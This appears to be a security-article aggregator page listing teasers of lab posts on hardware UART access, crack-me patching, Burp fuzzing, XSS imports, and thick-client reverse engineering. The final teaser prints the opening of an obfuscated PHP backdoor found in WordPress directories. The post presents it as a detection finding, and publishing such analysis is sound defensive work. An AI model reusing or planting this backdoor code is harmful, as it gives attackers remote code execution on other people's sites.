HackDig : Dig high-quality web security articles for hackers

Identifying UART Pins Without a Multi-Meter

As someone who likes to tinker with hardware, we often find ourselves opening up a device to find UART pins which are originally meant for debugging and testing. We often use these to connect to the device. But most of us hit a small snag here. Snag No 1: More often than not the pins are not labeled. (So you mean they put those pins there so we can te
Publish At:2019-09-19 14:11 | Read:735 | Comments:0 | Tags:Knowledge-base SecureLayer7 Lab HardwareSecurity Identifying

Reverse Engineering 101 – With Crack-mes

Reverse Engineering is a fascinating art of playing with low-level code. In this article, we will see a hands-on tutorial for patching an exe file to accept any serial key! Tools for use: ● Ollydbg (http://www.ollydbg.de/) ● A crack-me for demonstration. You can download loads of crack-mes for hands-on practice from http://crackmes.de/ A crack-me is a small
Publish At:2017-09-15 21:40 | Read:4701 | Comments:0 | Tags:SecureLayer7 Lab Crackme Ollydbg Reverse Engineering

Automating Web Apps Input fuzzing via Burp Macros

Hi Readers, This article is about Burp Suite Macros, which help us automate the effort of manual input payload fuzzing. While it may be known to many testers, this article is written for those who are yet to harness the power of Burp Suite’s macro automation. In my penetration testing career so far, while performing fuzzing of parameters and page fiel
Publish At:2017-09-03 05:00 | Read:4450 | Comments:0 | Tags:Knowledge-base OWASP SecureLayer7 Lab burp suite fuzzing inp

OWASP Top 10 : Cross-Site Scripting #3 Bad JavaScript Imports

Need to include cross domain resources: The ever-growing need to give website visitors a rich user experience has made it necessary for browsers to include cross-origin resources. Sometimes these resources can be data, a frame, an image or JavaScript. For example: A website http://example.com can have the following cross origin resources: Data from websit
Publish At:2017-08-28 03:30 | Read:5433 | Comments:0 | Tags:OWASP SecureLayer7 Lab Bad JavaScript Imports Client Side At

Static Analysis, Memory Forensics & Reverse Engineering on Thick Client Penetration Testing – Part 4

Static Analysis/ Reverse Engineering for Thick Clients Penetration Testing 4 Hi Readers, let’s take a look into static analysis. The advantage which thick clients offer over web applications is the ability to inspect the code and perform code level fuzzing which is more interesting for me! How to inspect code at a static level? There are many test cases whi
Publish At:2017-08-06 15:05 | Read:3770 | Comments:0 | Tags:SecureLayer7 Lab

Backdoor PHP code WordPress

We have detected a Backdoor PHP code. It is often hidden in the WP writable directory. This backdoor is used to send PHP code execution. <?php $yeqqdvu = 6110; function neceliemyz($rdcldpm, $oqwvlr) { $efogjgyh = ''; for($i=0; $i < strlen($rdcldpm); $i++){ $efogjgyh .= isset($oqwvlr[$rdcldpm[$i]]) ? $oqwvlr[$rdcldpm[$i]] : $rdcldpm[$i]; } $
Publish At:2016-04-21 12:40 | Read:3596 | Comments:0 | Tags:SecureLayer7 Lab Backdoor PHP code Wordpress
